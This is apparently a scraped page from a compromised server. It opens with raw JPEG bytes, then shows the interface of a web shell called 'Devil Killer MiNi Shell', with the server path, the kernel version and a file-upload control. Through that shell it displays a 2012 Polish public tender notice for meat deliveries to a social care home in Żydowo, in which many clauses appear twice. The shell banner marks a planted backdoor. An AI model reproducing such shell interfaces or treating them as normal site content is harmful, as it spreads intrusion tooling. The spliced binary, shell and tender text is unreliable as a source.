JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120702/229528-N-2012.html

<p class="kh_header"><b>Żydowo: Sukcesywna dostawa  produktów  zwierzęcych, mięsa i produktów mięsnych na potrzeby  Domu Pomocy Społecznej w Żydowie</b><br>
<b>Numer ogłoszenia: 229528 - 2012; data zamieszczenia: 02.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Żydowie , Żydowo 112, 76-012 Żydowo, woj. zachodniopomorskie, tel. 094 3188879, -87, - 89, faks 094 3188879.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dps.zydowo.ibip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Samorzadu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa  produktów  zwierzęcych, mięsa i produktów mięsnych na potrzeby  Domu Pomocy Społecznej w Żydowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia jest sukcesywna dostawa  produktów  zwierzęcych, mięsa i produktów mięsnych  na potrzeby Domu Pomocy Społecznej w Żydowie z podziałem części:      
Część Nr 1 Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych 
                             i wędlin
Część Nr 2 Sukcesywna dostawa   mięsa drobiowego produktów mięsnych
                             i wędlin
2)Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe zestawienie  ilościowe przedmiotu zamówienia z podziałem na części.
3)Artykuły będące przedmiotem zamówienia będą wytworzone i dostarczane zgodnie z ustawą o bezpieczeństwie żywności i żywienia z dnia 25.08.2006r. (tj. Dz. U. 2010 Nr 136, poz. 914 z późn. zm.) oraz aktualnych rozporządzeń wydanych na jej podstawie.
4)Dostarczane artykuły spożywcze powinny spełniać odpowiednie wymogi jakościowe, w tym spełniać warunki sanitarne produkcji przetwarzania, składowania, transportu oraz sprzedaży bezpośredniej. Wykonawca gwarantuje wysoką jakość artykułów zgodną z normami oraz zobowiązuje się do udzielenia gwarancji jakościowej na dostarczane artykuły (min. ? okresu     określonego przez producenta), gwarancja rozpoczyna swój bieg od dnia odbioru przez Zamawiającego.
5)Przedmiot dostawy powinien posiadać aktualny termin przydatności do spożycia oraz odpowiadać co do jakości normom i atestom obowiązującym w Polsce.
6)Gwarancja rozpoczyna swój bieg od daty odbioru każdej partii towaru.
7)Aktualny termin przydatności artykułów do spożycia,  ma być oznaczony na każdym artykule  w zależności od kategorii w sposób  czytelny,
8)Na każde żądanie Zamawiającego Wykonawca jest zobowiązany okazać w stosunku do każdego artykułu odpowiedni certyfikat zgodności z obowiązującymi normami.
9)Dostawy częściowe, o których mowa w pkt 1 następować będą w terminie nie dłuższym niż 2 dni od daty otrzymania zamówienia, chyba że Zamawiający ustali dłuższy termin.
10)Zamówienie składane  na dostawę  przesłane będzie faxem lub telefoniczne
11)Zamawiane artykuły powinny być dostarczane w opakowaniach (skrzynki, pojemniki itp.). Opakowanie powinno być dostosowane do właściwości danego artykułu i odpowiednie z punktu widzenia higieny i bezpieczeństwa zdrowotnego żywności, zgodnie z obowiązującymi przepisami. Środki transportu powinny być czyste i bez obcych zapachów
12)Wykonawca zapewnia dostawy przedmiotu zamówienia  przez cały okres trwania umowy.
13)Zamawiający zastrzega sobie prawo do niewykorzystania  pełnego limitu ilościowego   przedmiotu zamówienia   bez prawa roszczeń z tego  tytułu przez Wykonawcę ,a w szczególności z tytułu niezrealizowania umowy do pełnej wartości. Przysługuje  mu tylko   zapłata za faktycznie dostarczoną ilość.
14)Zamawiający zastrzega sobie prawo zmian ilościowych w ramach asortymentu  określonego   w  załączniku nr 1 do niniejszej siwz w granicach ogólnej wartości zamówienia.  
15)W związku z obowiązującym w Domu Pomocy Społecznej systemem HACCP należy przedstawić  w momencie rozpoczęcia dostaw i na żądanie SANEPID-u   n/w dokumenty:
a)Decyzja Państwowego Powiatowego Inspektoratu Sanitarnego dla środka transportu zezwalająca na przewóz produktów spożywczych(mięso i produkty mięsne)
b)Aktualne orzeczenie lekarskie z badania do celów sanitarno-  epidemiologicznych osoby dostarczającej towar
16)Umożliwienie kontroli środka transportu i pojemników (opakowań) do przewozu towaru pod    kątem czystości.
17)Do każdej dostawy Wykonawca dołącza:
.handlowy dokument identyfikacyjny
.WZ lub Fakturę
18)Odbioru jakościowego artykułów  dokonuje Zamawiający w chwili ich dostawy.
19)Jako termin realizacji dostawy rozumie się datę złożenia podpisu na dokumencie odbioru dostawy  przez  osobę  upoważnioną do odbioru ze strony Zamawiającego.
20)W przypadku dostarczenia artykułów z wadami lub brakami Wykonawca dokona wymiany lub ich uzupełnienia na artykuły wolne od wad na swój koszt w terminie 24 godzin od dostawy artykułów.
21)W razie wykrycia w terminie późniejszym wad w przedmiocie dostawy Zamawiający zobowiązany jest niezwłocznie złożyć Wykonawcy reklamację pisemnie lub ustnie do dokumentu odbioru.
22)Załatwienie reklamacji winno nastąpić niezwłocznie w trybie indywidualnych uzgodnień i w sposób właściwy dla danego towaru, nie później niż w ciągu 2 dni.
23)W przypadku niedostarczenia przez Wykonawcę artykułów wcześniej zamówionych, o niższej niż deklarowana jakości lub w jakikolwiek inny sposób niezgodnej z przedmiotem zamówienia, Zamawiającemu przysługuje prawo do zakupu interwencyjnego odpowiedniej ilości artykułów, będących przedmiotem dostawy, na wolnym rynku od innego dostawcy w ilości i asortymencie nie zrealizowanej dostawy.
24)W przypadku zakupu interwencyjnego Wykonawca zobowiązany jest do zwrotu Zamawiającemu różnicy pomiędzy ceną zakupu interwencyjnego, a  ceną dostawy ustaloną w zawartej z Wykonawcą umowie.
25)W przypadku nie przestrzegania warunków jakościowych lub sanitarnych produkcji i transportu oraz w przypadku trzykrotnego pisemnego upomnienia Wykonawcy w związku z wykonaniem umowy z nienależytą starannością, Zamawiający ma prawo  odstąpienia od umowy w trybie natychmiastowym bez zachowania terminu wypowiedzenia. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.
26)W szczególnych przypadkach wynikających z okoliczności, których nie można było przewidzieć, np. zaprzestanie produkcji, zmiana nazwy asortymentu, dopuszcza się możliwość zastąpienia go towarem o  nie gorszych parametrach i w tej samej cenie.
27)Płatność będzie realizowana sukcesywnie po każdej dostawie przedmiotu zamówienia do  Zamawiającego,  na podstawie faktur  wystawianych   na płatnika  Dom Pomocy Społecznej  w  Żydowie  w terminie 30 dni, licząc od daty  doręczenia  faktury do  Zamawiającego. Należność płatna przelewem na rachunek Wykonawcy.
28)Obowiązującą    forma odszkodowania za realizacje przedmiotu zamówienia stanowić będą  kary umowne określone w załączonej umowie.
 Nazwa i kody stosowane we  Wspólnym Słowniku Zamówień (CPV) 
.Kod 15.00.00.00-8        Żywność
.Kod 15.10.00.00-9       Produkty zwierzęce, mięso i produkty mięsne
 
3)Artykuły będące przedmiotem zamówienia będą wytworzone i dostarczane zgodnie z ustawą o bezpieczeństwie żywności i żywienia z dnia 25.08.2006r. (tj. Dz. U. 2010 Nr 136, poz. 914 z późn. zm.) oraz aktualnych rozporządzeń wydanych na jej podstawie.
4)Dostarczane artykuły spożywcze powinny spełniać odpowiednie wymogi jakościowe, w tym spełniać warunki sanitarne produkcji przetwarzania, składowania, transportu oraz sprzedaży bezpośredniej. Wykonawca gwarantuje wysoką jakość artykułów zgodną z normami oraz zobowiązuje się do udzielenia gwarancji jakościowej na dostarczane artykuły (min. ? okresu     określonego przez producenta), gwarancja rozpoczyna swój bieg od dnia odbioru przez Zamawiającego.

5)Przedmiot dostawy powinien posiadać aktualny termin przydatności do spożycia oraz odpowiadać co do jakości normom i atestom obowiązującym w Polsce.

6)Gwarancja rozpoczyna swój bieg od daty odbioru każdej partii towaru.

7)Aktualny termin przydatności artykułów do spożycia,  ma być oznaczony na każdym artykule  w zależności od kategorii w sposób  czytelny,
8)Na każde żądanie Zamawiającego Wykonawca jest zobowiązany okazać w stosunku do każdego artykułu odpowiedni certyfikat zgodności z obowiązującymi normami.

9)Dostawy częściowe, o których mowa w ust. 1 następować będą w terminie nie dłuższym niż 2 dni od daty otrzymania zamówienia, chyba że Zamawiający ustali dłuższy termin.

10)Zamówienie składane  na dostawę  przesłane będzie faxem lub telefoniczne

11)Zamawiane artykuły powinny być dostarczane w opakowaniach (skrzynki, pojemniki itp.). Opakowanie powinno być dostosowane do właściwości danego artykułu i odpowiednie z punktu widzenia higieny i bezpieczeństwa zdrowotnego żywności, zgodnie z obowiązującymi przepisami. Środki transportu powinny być czyste i bez obcych zapachów.

12)Wykonawca zapewnia dostawy przedmiotu zamówienia  przez cały okres trwania umowy.

13)Zamawiający zastrzega sobie prawo do niewykorzystania  pełnego limitu ilościowego   przedmiotu zamówienia   bez prawa roszczeń z tego  tytułu przez Wykonawcę ,a w     szczególności z tytułu niezrealizowania umowy do pełnej wartości. Przysługuje  mu tylko   zapłata za faktycznie dostarczoną ilość.

14)Zamawiający zastrzega sobie prawo zmian ilościowych w ramach asortymentu  określonego   w  załączniku nr 1 do niniejszej siwz w granicach ogólnej wartości zamówienia
15)W związku z obowiązującym w Domu Pomocy Społecznej systemem HACCP należy przedstawić  w momencie rozpoczęcia dostaw i na żądanie SANEPID-u   n/w dokumenty:
a)Decyzja Państwowego Powiatowego Inspektoratu Sanitarnego dla środka transportu zezwalająca na przewóz produktów spożywczych(mięso i produkty mięsne)
b)Aktualne orzeczenie lekarskie z badania do celów sanitarno-  epidemiologicznych osoby dostarczającej towar

16)Umożliwienie kontroli środka transportu i pojemników (opakowań) do przewozu towaru pod    kątem czystości.

17)Do każdej dostawy Wykonawca dołącza:
.	handlowy dokument identyfikacyjny
.	WZ lub Fakturę
18)Odbioru jakościowego artykułów  dokonuje Zamawiający w chwili ich dostawy.
19)Jako termin realizacji dostawy rozumie się datę złożenia podpisu na dokumencie odbioru dostawy  przez  osobę  upoważnioną do odbioru ze strony Zamawiającego.
20)W przypadku dostarczenia artykułów z wadami lub brakami Wykonawca dokona wymiany lub ich uzupełnienia na artykuły wolne od wad na swój koszt w terminie 24 godzin od dostawy artykułów.
21)W razie wykrycia w terminie późniejszym wad w przedmiocie dostawy Zamawiający zobowiązany jest niezwłocznie złożyć Wykonawcy reklamację pisemnie lub ustnie do dokumentu odbioru.
22)Załatwienie reklamacji winno nastąpić niezwłocznie w trybie indywidualnych uzgodnień i w sposób właściwy dla danego towaru, nie później niż w ciągu 2 dni
23)W przypadku niedostarczenia przez Wykonawcę artykułów wcześniej zamówionych, o niższej niż deklarowana jakości lub w jakikolwiek inny sposób niezgodnej z przedmiotem zamówienia, Zamawiającemu przysługuje prawo do zakupu interwencyjnego odpowiedniej ilości artykułów, będących przedmiotem dostawy, na wolnym rynku od innego dostawcy w ilości i asortymencie nie zrealizowanej dostawy.
24)W przypadku zakupu interwencyjnego Wykonawca zobowiązany jest do zwrotu Zamawiającemu różnicy pomiędzy ceną zakupu interwencyjnego, a  ceną dostawy ustaloną w zawartej z Wykonawcą umowie.
25)W przypadku nie przestrzegania warunków jakościowych lub sanitarnych produkcji i transportu oraz w przypadku trzykrotnego pisemnego upomnienia Wykonawcy w związku z wykonaniem umowy z nienależytą starannością, Zamawiający ma prawo  odstąpienia od umowy w trybie natychmiastowym bez zachowania terminu wypowiedzenia. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy
26)W szczególnych przypadkach wynikających z okoliczności, których nie można było przewidzieć, np. zaprzestanie produkcji, zmiana nazwy asortymentu, dopuszcza się możliwość zastąpienia go towarem o  nie gorszych parametrach i w tej samej cenie.
27)Płatność będzie realizowana sukcesywnie po każdej dostawie przedmiotu zamówienia do  Zamawiającego,  na podstawie faktur  wystawianych   na płatnika  Dom Pomocy Społecznej  w  Żydowie  w terminie 30 dni, licząc od daty  doręczenia  faktury do  Zamawiającego. Należność płatna przelewem na rachunek Wykonawcy.
28)Obowiązującą    forma odszkodowania za realizacje przedmiotu zamówienia stanowić będą  kary umowne określone w załączonej umowie.
 
Nazwa i kody stosowane we  Wspólnym Słowniku Zamówień (CPV): 
.	Kod 15.00.00.00-8        Żywność
.	Kod 15.10.00.00-9       Produkty zwierzęce, mięso i produkty mięsne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia  wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany udokumentować wykonanie w okresie ostatnich trzech lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej jednej dostawy  odpowiadającej swoim  rodzajem oraz porównywalną  wartością dostawom  stanowiącym przedmiot zamówienia  tj. sukcesywna dostawa  produktów  zwierzęcych, mięsa i  produktów mięsnych  na potrzeby Domu Pomocy Społecznej w Żydowie  Część Nr ...........  Wykonawca musi złożyć wykaz  na/wg   załącznika nr 5 do SIWZ wraz z   wymaganymi   dokumentami potwierdzającymi, że dostawy zostały wykonane należycie
Ocena spełniania w/w warunków zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.
UWAGA! 
W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W takich przypadkach Wykonawca musi przedstawić pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp).

Ocena spełniania w/w warunków zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.
UWAGA! 
W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W takich przypadkach Wykonawca musi przedstawić pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp).

Ocena spełniania w/w warunków zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.
UWAGA! 
W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W takich przypadkach Wykonawca musi przedstawić pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp).

Ocena spełniania w/w warunków zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)SZCZEGÓŁOWE ZESTAWIENIE ILOŚCIOWE PRZEDMIOTU   
 ZAMÓWIENIA  Część Nr................ wypełnione na/wg Załącznika nr 1 do SIWZ. 
2)WYPEŁNIONY FORMULARZ OFERTOWY  na/wg Załącznika nr 2 do SIWZ. 
3)Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć
 PEŁNOMOCNICTWO(A) lub UPOWAŻNIENIE(A) do działania w imieniu Wykonawcy
 (podpisanie oferty, reprezentowanie Wykonawcy ewentualnie inne działania np. 
 podpisanie umowy) - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu 
 Wykonawcy nie wynikają z innych złożonych dokumentów. 
 W przypadku gdy Wykonawca prowadzi działalność w formie spółki cywilnej, a oferta nie  zostanie podpisana przez wszystkich wspólników, należy przedłożyć dodatkowe  dokumenty, z których będą wynikały   uprawnienia wspólnika(ów) podpisujących ofertę (umowa spółki, pełnomocnictwo lub inne).
4)OŚWIADCZENIE WYKONAWCY, że wdrożył zasady i procedury, spełnia wymagania higieniczne i warunki konieczne dla zapewnienia bezpieczeństwa żywności, tj. artykułów będących przedmiotem zamówienia - na/wg Załącznika nr 7 do SIWZ
UWAGA! 
OFERTA, WYKAZY I OŚWIADCZENIA WYKONAWCY MUSZĄ BYĆ ZŁOŻONE W FORMIE ORYGINAŁÓW. INNE DOKUMENTY WYMIENIONE W PUNKCIE VI  MUSZĄ BYĆ ZŁOŻONE WRAZ Z OFERTĄ w formie oryginałów lub kopii poświadczonych -za zgodność z oryginałem /każda zapisana strona/.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps.zydowo.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia udostępniona jest  na stronie internetowej oraz w formie papierowej w siedzibie DPS w Żydowie 107, pok.3, w dni robocze w godz. od 9:00 - 14:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego:
          
DOM POMOCY SPOŁECZNEJ W ŻYDOWIE   76 - 012 Żydowo107,
pow. Koszalin ,  pokój nr 5(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
